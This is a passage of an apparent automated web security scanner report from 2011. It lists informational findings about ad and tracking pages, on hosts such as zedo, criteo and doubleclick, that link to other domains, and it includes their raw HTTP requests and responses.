Last-Modified: Wed, 24 Aug 2011 17:19:34 GMT
Content-Type: text/html
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 03:17:51 GMT
Content-Length: 1409
Connection: close
Cache-Control: max-age=604800, s-maxage=86400, public

<html>
<body>
<script>
var vars = {};
var v = document.location.search.substring(1).split("&");
for (var i = 0; i < v.length; i++)
{
var kv = v[i].split("=");
vars[kv[0
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

21.50. http://core.videoegg.com/eap/latest/html/jstags.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://core.videoegg.com
Path:   /eap/latest/html/jstags.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /eap/latest/html/jstags.html?CCID=1242772-1&r=0.7754915065597743 HTTP/1.1
Host: core.videoegg.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/city/mumbai/My-friend-Ganesha/articleshow/9855193.cms
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
ETag: "c1285707168d4ed3b69ca3d4b048c0f4:1314921396"
Last-Modified: Thu, 01 Sep 2011 23:42:44 GMT
Content-Type: text/html
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 03:08:07 GMT
Content-Length: 1409
Connection: close
Cache-Control: max-age=604800, s-maxage=86400, public

<html>
<body>
<script>
var vars = {};
var v = document.location.search.substring(1).split("&");
for (var i = 0; i < v.length; i++)
{
var kv = v[i].split("=");
vars[kv[0
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

21.51. http://d7.zedo.com/bar/v16-504/d8/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-504/d8/jsc/fm.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /bar/v16-504/d8/jsc/fm.js?c=589/122/121&a=0&f=&n=1185&r=13&d=14&q=&$=&s=76&z=0.1346084768883884 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.dnaindia.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZFFBbh=977B826,20|121_977#0; ZFFAbh=977B826,20|121_977#365; FFBbh=977B305,20|149_1#0; FFgeo=5386156; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZCBC=1; FFSkp=305,825,15,1:; FFcat=305,825,15; FFad=0; FFMChanCap=2457780B305,825#722607|0,1#0,24; PI=h639958Za722607Zc305000825,305000825Zs263Zt1246; ZEDOIDX=13

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFMCap=2457900B1185,234056,234851:933,196008|1,1#0,24:0,1#0,24:0,1#0,24;expires=Tue, 04 Oct 2011 02:31:37 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=1185,589,14:767,33,40:767,4,94:826,471,9:767,4,9:767,4,41:826,471,14:767,4,14:1185,833,14:933,56,15:1302,202,9:305,825,15;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=1:1:1:1:1:1:1:1:0:1:0:0;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "4368e0d-8952-4aa4dfbf231c0"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=181
Expires: Sun, 04 Sep 2011 02:34:38 GMT
Date: Sun, 04 Sep 2011 02:31:37 GMT
Content-Length: 3656
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var y10=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=76;var zzPat='';var zzC
...[SNIP]...
</span>")
document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N3340.152125.OZONEMEDIA.COM/B5807973;sz=728x90;pc=[TPAS_ID];click=http://yads.zedo.com/ads2/c?a=1015462%3Bn=1185%3Bx=3597%3Bc=1185000589%2C1185000589%3Bg=172%3Bi=1%3B1=8%3B2=1%3Bs=76%3Bg=172%3Bm=82%3Bw=47%3Bi=1%3Bu=k5xiThcyanucBq9IXvhSGSz5~090311%3Bp%3D8%3Bf%3D1235423%3Bh%3D1197692%3Bb%3D1440%3Bk%3D;ord='+Math.random()+'?">');
document.write('<\/script>
...[SNIP]...

21.52. http://dis.criteo.com/dis/optoutstatus.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dis.criteo.com
Path:   /dis/optoutstatus.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /dis/optoutstatus.aspx?s=nai&o=1&c=1&nocache=0.6258464 HTTP/1.1
Host: dis.criteo.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=thgxgxparfud0etfcd14clod; optout=1

Response

HTTP/1.1 302 Found
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
P3P: CP="NON DSP COR CURa PSA PSD OUR BUS NAV STA"
Date: Sun, 04 Sep 2011 11:14:46 GMT
Location: http://www.networkadvertising.org/optout/opt_success.gif
Expires: -1
Pragma: no-cache
Content-Length: 173

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.networkadvertising.org/optout/opt_success.gif">here</a>.</h2>
</body></html>

21.53. http://dis.criteo.com/dis/optoutstatus.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dis.criteo.com
Path:   /dis/optoutstatus.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /dis/optoutstatus.aspx?s=nai&nocache=0.7407737 HTTP/1.1
Host: dis.criteo.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/opt_out.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
P3P: CP="NON DSP COR CURa PSA PSD OUR BUS NAV STA"
Date: Sun, 04 Sep 2011 10:59:32 GMT
Location: http://www.networkadvertising.org/verify/cookie_optout.gif
Expires: -1
Pragma: no-cache
Content-Length: 175

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.networkadvertising.org/verify/cookie_optout.gif">here</a>.</h2>
</body></html>

21.54. http://edge.aperture.displaymarketplace.com/anotnai.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://edge.aperture.displaymarketplace.com
Path:   /anotnai.gif

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /anotnai.gif?nocache=0.287586&confirmNoTrack=true HTTP/1.1
Host: edge.aperture.displaymarketplace.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NoTrack="Aperture Opt-Out"

Response

HTTP/1.1 302 Moved Temporarily
Server: Microsoft-IIS/6.0
X-Server: D2H.NJ-a.dm.com_x
P3P: CP="NON DEVo PSAo PSDo CONo OUR BUS UNI"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: http://www.networkadvertising.org/optout/opt_success.gif
Content-Type: text/html; charset=utf-8
Content-Length: 173
Expires: Sun, 04 Sep 2011 11:16:49 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 04 Sep 2011 11:16:49 GMT
Connection: close
Vary: Accept-Encoding

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.networkadvertising.org/optout/opt_success.gif">here</a>.</h2>
</body></html>

21.55. http://edge.aperture.displaymarketplace.com/anotnaistat.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://edge.aperture.displaymarketplace.com
Path:   /anotnaistat.gif

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /anotnaistat.gif?nocache=0.2790411 HTTP/1.1
Host: edge.aperture.displaymarketplace.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/opt_out.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NoTrack="Aperture Opt-Out"

Response

HTTP/1.1 302 Moved Temporarily
Server: Microsoft-IIS/6.0
X-Server: D2D.NJ-a.dm.com
P3P: CP="NON DEVo PSAo PSDo CONo OUR BUS UNI"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: http://www.networkadvertising.org/verify/cookie_optout.gif
Content-Type: text/html; charset=utf-8
Content-Length: 175
Expires: Sun, 04 Sep 2011 11:38:31 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 04 Sep 2011 11:38:31 GMT
Connection: close
Vary: Accept-Encoding

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.networkadvertising.org/verify/cookie_optout.gif">here</a>.</h2>
</body></html>

21.56. http://edge.aperture.displaymarketplace.com/anotnaistat.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://edge.aperture.displaymarketplace.com
Path:   /anotnaistat.gif

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /anotnaistat.gif?nocache=0.6446417 HTTP/1.1
Host: edge.aperture.displaymarketplace.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/opt_out.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved Temporarily
Server: Microsoft-IIS/6.0
X-Server: D2H.NJ-a.dm.com_x
P3P: CP="NON DEVo PSAo PSDo CONo OUR BUS UNI"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: http://www.networkadvertising.org/verify/no_cookie.gif
Content-Type: text/html; charset=utf-8
Content-Length: 171
Expires: Sun, 04 Sep 2011 10:59:01 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 04 Sep 2011 10:59:01 GMT
Connection: close
Vary: Accept-Encoding

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.networkadvertising.org/verify/no_cookie.gif">here</a>.</h2>
</body></html>

21.57. http://feed.mikle.com/feeds/rssmikle.cgi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://feed.mikle.com
Path:   /feeds/rssmikle.cgi

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /feeds/rssmikle.cgi?rssmikle_url=http%3A%2F%2Fwww.asianewsnet.net%2Frss%2Ftop_story.xml&rssmikle_type=&rssmikle_frame_width=325&rssmikle_frame_height=200&rssmikle_frame_rico=&rssmikle_target=_blank&rssmikle_font_size=14&rssmikle_border=on&rssmikle_css_url=&rssmikle_title=off&rssmikle_title_bgcolor=%232561BA&rssmikle_title_color=%23FFFFFF&rssmikle_title_bgimage=http%3A%2F%2F&rssmikle_item_bgcolor=%23FFFFFF&rssmikle_item_bgimage=http%3A%2F%2F&rssmikle_item_title_length=100&rssmikle_item_title_color=%232F50A3&rssmikle_item_border_bottom=on&rssmikle_item_description=on&rssmikle_item_description_length=40&rssmikle_item_description_color=%23666666&rssmikle_item_description_tag=off&rssmikle_item_podcast=icon HTTP/1.1
Host: feed.mikle.com
Proxy-Connection: keep-alive
Referer: http://www.nationmultimedia.com/home/nt-widget/ann-feed.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:27:55 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.3.5
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13654


<!--html cached --><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta h
...[SNIP]...
</title>
<base href="http://www.asianewsnet.net/" />

<style type='text/css'>
...[SNIP]...
<div class="feed_item_title"><a href="http://asianewsnetwork.feedsportal.com/c/33359/f/566602/s/17ee84d1/l/0L0Sasianewsnet0Bnet0Chome0Cnews0Bphp0Did0F21347/story01.htm" target="_blank">Despite obesity, Chinese turn out to be healthier</a>
...[SNIP]...
<div class="feed_item_title"><a href="http://asianewsnetwork.feedsportal.com/c/33359/f/566602/s/17ee99f4/l/0L0Sasianewsnet0Bnet0Chome0Cnews0Bphp0Did0F21343/story01.htm" target="_blank">Japanese PM Noda launches Cabinet, vows to speed up disaster reconstruction</a>
...[SNIP]...
<div class="feed_item_title"><a href="http://asianewsnetwork.feedsportal.com/c/33359/f/566602/s/17ee99f3/l/0L0Sasianewsnet0Bnet0Chome0Cnews0Bphp0Did0F21344/story01.htm" target="_blank">BernamaTV cameraman killed in Somalia</a>
...[SNIP]...
<div class="feed_item_title"><a href="http://asianewsnetwork.feedsportal.com/c/33359/f/566602/s/17ee99f2/l/0L0Sasianewsnet0Bnet0Chome0Cnews0Bphp0Did0F21345/story01.htm" target="_blank">Yingluck admin seeks details on 'secret' meetings with Cambodia</a>
...[SNIP]...
<div class="feed_item_title"><a href="http://asianewsnetwork.feedsportal.com/c/33359/f/566602/s/17ee71b0/l/0L0Sasianewsnet0Bnet0Chome0Cnews0Bphp0Did0F21342/story01.htm" target="_blank">Arroyo's husband sued for plunder</a>
...[SNIP]...
<div class="feed_item_title"><a href="http://asianewsnetwork.feedsportal.com/c/33359/f/566602/s/17e74589/l/0L0Sasianewsnet0Bnet0Chome0Cnews0Bphp0Did0F21341/story01.htm" target="_blank">Xinjiang aids strong ties with neighbors: Pakistani President</a>
...[SNIP]...
<div class="feed_item_title"><a href="http://asianewsnetwork.feedsportal.com/c/33359/f/566602/s/17e61cf7/l/0L0Sasianewsnet0Bnet0Chome0Cnews0Bphp0Did0F21322/story01.htm" target="_blank">China warns off Indian ship in South China Sea</a>
...[SNIP]...

21.58. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-3070849023962414&output=html&h=90&slotname=5742153653&w=728&ea=0&flash=10.3.183&url=http%3A%2F%2Fwww.bangkokpost.com%2Fbusiness%2Ftelecom&dt=1315103712462&bpp=210&shv=r20110824&jsv=r20110719&correlator=1315103715949&frm=7&adk=197260718&ga_vid=1672749663.1315103143&ga_sid=1315103143&ga_hid=1576642384&ga_fc=1&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=times%20new%20roman&dfs=16&biw=1217&bih=1037&ifk=1494195821&fu=4&ifi=1&dtd=3490 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=229b025847010047||t=1314754416|et=730|cs=002213fd48ab1c4d1bf867f0d1

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 04 Sep 2011 02:34:38 GMT
Server: cafe
Cache-Control: private
Content-Length: 3668
X-XSS-Protection: 1; mode=block

<!doctype html><html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=functio
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/ad_choices_i.png' alt="(i)" border=0 height=15px width=19px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.bangkokpost.net/business/telecom%26hl%3Den%26client%3Dca-pub-3070849023962414%26adU%3Dwww.softlayer.com%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNFj4mYkaZ0qjf7DBVBHCdKIN_NS1w" target=_blank><img alt="AdChoices" border=0 height=15px src=http://pagead2.googlesyndication.com/pagead/images/ad_choices_en.png width=77px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/r20110824/r20110719/abg.js"></script>
...[SNIP]...

21.59. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-7641565019577886&format=728x90_as&output=html&h=90&w=728&region=test&ad_type=image&ea=0&flash=10.3.183&url=http%3A%2F%2Fwww.ndtv.com%2Farticle%2Findia%2Fturkish-air-plane-skids-off-taxiway-at-mumbai-airport-130917&dt=1315103342955&bpp=5&shv=r20110824&jsv=r20110719&correlator=1315103343021&frm=8&adk=2733553199&ga_vid=1488765363.1315103343&ga_sid=1315103343&ga_hid=1501991032&ga_fc=0&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=times%20new%20roman&dfs=16&biw=-12245933&bih=-12245933&ifk=3717608154&fu=0&ifi=1&dtd=69 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=229b025847010047||t=1314754416|et=730|cs=002213fd48ab1c4d1bf867f0d1

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 04 Sep 2011 02:28:25 GMT
Server: cafe
Cache-Control: private
Content-Length: 4289
X-XSS-Protection: 1; mode=block

<html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=function(a){window.sta
...[SNIP]...
<div id="google_flash_div" style="position:absolute;left:0px;z-index:1001"><OBJECT classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" id="google_flash_obj" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0" WIDTH="728" HEIGHT="90"><PARAM NAME=movie VALUE="http://pagead2.googlesyndication.com/pagead/imgad?id=CKiUvK6u5KiNoAEQ2AUYWjIIqbPSFHRbPtg">
...[SNIP]...
uAIYyALcw8UbqAMB6APLAegD1SfoA5YF9QMAAABEoAYE%26num%3D1%26sig%3DAOD64_1WLxffaaBrUFRm6mIs1sCkCd9RWQ%26client%3Dca-pub-7641565019577886%26adurl%3Dhttp://www.ztsystems.com/Default.aspx%253Ftabid%253D1493"><EMBED src="http://pagead2.googlesyndication.com/pagead/imgad?id=CKiUvK6u5KiNoAEQ2AUYWjIIqbPSFHRbPtg" id="google_flash_embed" WIDTH="728" HEIGHT="90" WMODE="opaque" FlashVars="clickTAG=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBNFfrSeJiTu78BpekjQSu0Nn-AaSE_-wBpK-mjRfAjbcBABABGAEg7JuJBjgAUJbK_tsDYMnW-obIo6AZoAHQi_DtA7IBDHd3dy5uZHR2LmNvbboBCTcyOHg5MF9hc8gBBNoBXmh0dHA6Ly93d3cubmR0di5jb20vYXJ0aWNsZS9pbmRpYS90dXJraXNoLWFpci1wbGFuZS1za2lkcy1vZmYtdGF4aXdheS1hdC1tdW1iYWktYWlycG9ydC0xMzA5MTeAAgGYAvYduAIYyALcw8UbqAMB6APLAegD1SfoA5YF9QMAAABEoAYE%26num%3D1%26sig%3DAOD64_1WLxffaaBrUFRm6mIs1sCkCd9RWQ%26client%3Dca-pub-7641565019577886%26adurl%3Dhttp://www.ztsystems.com/Default.aspx%253Ftabid%253D1493" TYPE="application/x-shockwave-flash" AllowScriptAccess="never" PLUGINSPAGE="http://www.macromedia.com/go/getflashplayer"></EMBED>
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/ad_choices_i.png' alt="(i)" border=0 height=15px width=19px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.ndtv.com/article/india/turkish-air-plane-skids-off-taxiway-at-mumbai-airport-130917%26hl%3Den%26client%3Dca-pub-7641565019577886%26adU%3Dwww.ZTSystems.com%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNGIjybJiyou9xUFhZJ0OfmNcCxoXw" target=_blank><img alt="AdChoices" border=0 height=15px src=http://pagead2.googlesyndication.com/pagead/images/ad_choices_en.png width=77px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/r20110824/r20110719/abg.js"></script>
...[SNIP]...

21.60. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-7641565019577886&format=728x90_as&output=html&h=90&w=728&region=test&ad_type=image&ea=0&flash=10.3.183&url=http%3A%2F%2Fwww.ndtv.com%2Farticle%2Findia%2F48-hours-on-mumbai-airports-main-runway-still-shut-131142&dt=1315103194528&bpp=15&shv=r20110824&jsv=r20110719&correlator=1315103194603&frm=8&adk=2733553199&ga_vid=1678687974.1315103195&ga_sid=1315103195&ga_hid=256457380&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=times%20new%20roman&dfs=16&biw=-12245933&bih=-12245933&ifk=3717608154&fu=0&ifi=1&dtd=79 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=229b025847010047||t=1314754416|et=730|cs=002213fd48ab1c4d1bf867f0d1

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 04 Sep 2011 02:25:56 GMT
Server: cafe
Cache-Control: private
Content-Length: 3764
X-XSS-Protection: 1; mode=block

<!doctype html><html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=functio
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/ad_choices_i.png' alt="(i)" border=0 height=15px width=19px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.ndtv.com/article/india/48-hours-on-mumbai-airports-main-runway-still-shut-131142%26hl%3Den%26client%3Dca-pub-7641565019577886%26adU%3Dwww.softlayer.com%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNFURMVsVqZt-ABdliVtDz5EBUk8Mw" target=_blank><img alt="AdChoices" border=0 height=15px src=http://pagead2.googlesyndication.com/pagead/images/ad_choices_en.png width=77px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/r20110824/r20110719/abg.js"></script>
...[SNIP]...

21.61. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-7641565019577886&format=728x90_as&output=html&h=90&w=728&region=test&ad_type=image&ea=0&flash=0&url=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue&dt=1315103832364&bpp=21&shv=r20110824&jsv=r20110719&correlator=1315103832409&frm=8&adk=2733553199&ga_vid=1321940311.1315103834&ga_sid=1315103834&ga_hid=112359472&ga_fc=0&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=18&u_nmime=96&dff=serif&dfs=16&biw=-12245933&bih=-12245933&ifk=3717608154&eid=33895167&fu=0&ifi=1&dtd=1484 HTTP/1.1
Host: googleads.g.doubleclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://d2.zedo.com/jsc/d2/ff2.html?n=767;c=33/1;d=40;w=728;h=90
Cookie: id=229a9504260100ca||t=1312233693|et=730|cs=002213fd4876a8a011eba88ea7

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 04 Sep 2011 02:36:36 GMT
Server: cafe
Cache-Control: private
Content-Length: 3939
X-XSS-Protection: 1; mode=block

<!doctype html><html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=functio
...[SNIP]...
